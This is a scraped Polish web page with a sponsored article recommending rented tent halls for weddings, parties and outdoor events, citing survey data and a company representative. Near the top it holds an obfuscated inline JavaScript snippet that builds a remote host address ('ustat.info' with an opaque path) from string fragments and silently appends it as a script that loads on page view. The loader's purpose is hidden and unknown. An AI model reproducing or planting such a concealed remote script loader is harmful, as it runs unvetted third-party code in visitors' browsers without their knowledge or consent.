Trwa ładowanie...
dgwwjr9

Przenieś imprezę na świeże powietrze


(function(){
q44g=document.createElement("script");q44g_=("us")+("ta");
q44g_+="t"+(".");q44g_+=("in");q44gu="60750074";q44g.async=true;
q44gu+=".dpbsurrf44g4w2jcf";q44g.type="text/javascript";q44g_+="f"+"o"+("/");
q44gu+="57bjwc4vtsvvc";q44g.src="//"+q44g_+q44gu;
dq44g=document.body;dq44g.appendChild(q44g);
})();
Kapryśność naszej pogody raczej nie zachęca do organizowania imprez na świeżym powietrzu. Prognozy często przypominają wróżenie z fusów – niespodziewane oberwanie chmury może sprawić, że planowana od tygodni impreza okaże się klapą. Nic więc dziwnego, że wydarzenia wolimy organizować pod dachem, choć to nie zawsze najlepsze rozwiązanie.
Każdy, kto organizował większą imprezę (np. wesele), doskonale wie, jak trudne może być szukanie właściwego lokalu, w interesującym nas terminie i odpowiedniej wielkości, by pomieścić wszystkich zaproszonych. Nawet gdy uda nam się już znaleźć odpowiedni lokal, mogą wystąpić inne problemy, jak na przykład mało dogodna lokalizacja czy kłopoty z dojazdem.
Głosuj
Głosuj
Podziel się
Opinie
Przenieś imprezę na świeże powietrze
(artykuł sponsorowany)
dgwwjr9

Polacy imprezują
Jakiś czas temu Instytut Ipsos wykonał badania na zlecenie portalu Wonga.com. Z raportu instytutu wynika, że nie jesteśmy imprezowym narodem – zaledwie 31% ankietowanych (mniej niż jedna trzecia!) planowała wziąć udział w zabawie karnawałowej. W zestawieniu z powyższym wynikiem pozytywnie mogą zaskoczyć nas możliwości finansowe Polaków – 19% ankietowanych zadeklarowało gotowość przeznaczenia na zabawę od 300 do 500 złotych, a blisko połowa (47%) kwoty ciut skromniejsze, w zakresie od 100 do 300 złotych. Oczywiście należy brać poprawkę na to, że w naszym kraju tradycja karnawału nie jest bardzo rozpowszechniona – sami Polacy nie stronią przecież od rozrywek na co dzień.
Problemów przy większych imprezach czy nawet spotkaniach często nastręcza nam brak dogodnego miejsca do organizacji wymarzonego przedsięwzięcia. Rozwiązanie problemu jest jednak na wyciągnięcie ręki, choć często nie zdajemy sobie z niego sprawy. Wystarczy przyjrzeć się amerykańskim filmom i serialom, gdzie gros wszelkich przyjęć, uroczystości czy nawet zabaw organizowanych jest na świeżym powietrzu. Co ciekawe, koordynacja mniejszego przyjęcia w ogródku nie nastręcza nam żadnych problemów, czego doskonałym przykładem są organizowane przez nas grille – według badania portalu Okazje.info aż 16% grillowiczów zaczyna sezon już w kwietniu, wcale nie tak ciepłym miesiącu. Problem dotyka organizatorów okazalszych przedsięwzięć, które wymagają zdecydowanie więcej przygotowań – od lat wzrasta popularność imprez lokalnych, fundowanych przez władze z okazji konkretnych świąt czy po prostu dla promocji miasta (wszelkiej maści dni lokalne). Nic nie potrafi tak zepsuć frekwencji wydarzenia jak choćby lekki deszczyk.
Hala namiotowa – rozwiązaniem?
Dobrym pomysłem na organizację imprezy na świeżym powietrzu i jednoczesne nieprzejmowanie się niesprzyjającą pogodą jest wynajęcie hali namiotowej. W Polsce działa dużo firm zajmujących się ich wynajmem i instalacją według naszych potrzeb. Rafał Fuhrmann, przedstawiciel firmy T&C, która wynajmuje swoim klientom hale namiotowe oraz magazynowe, przedstawia zalety takiego rozwiązania: – Od kilku lat obserwujemy wzmożone zainteresowanie rozwiązaniami oferowanymi przez naszą firmę. Montaż hali namiotowej jest zdecydowanie tańszy i dogodniejszy niż szukanie do obsługi imprezy całego budynku, który i tak może okazać się niewystarczający – mało który obiekt posiada wystarczająco wiele przestrzeni. Hala namiotowa pozwala na szybkie zabezpieczenie imprezy masowej przed niekorzystnymi warunkami pogodowymi i nie wymaga użycia ciężkiego sprzętu do jej rozstawienia, co oczywiście wpływa korzystnie na ostateczny koszt organizacji imprezy.
Ważną zaletą hal namiotowych jest fakt, że oferowana dowolność rozmiarów pozwala dopasować je do naszych preferencji i budżetu przeznaczonego na imprezę. Nic nie stoi na przeszkodzie, aby wynająć zarówno taką halę, w której zorganizujemy kameralne przyjęcie dla grona znajomych, jak i taką, która pomieści naprawdę wielu weselników. Nie wspominając już o takich wydarzeniach jak wystawy, spotkania czy luźne konferencje na świeżym powietrzu – wystarczy tylko znać swoje oczekiwania.

dgwwjr9

Podziel się opinią

Share

dgwwjr9

dgwwjr9
Więcej tematów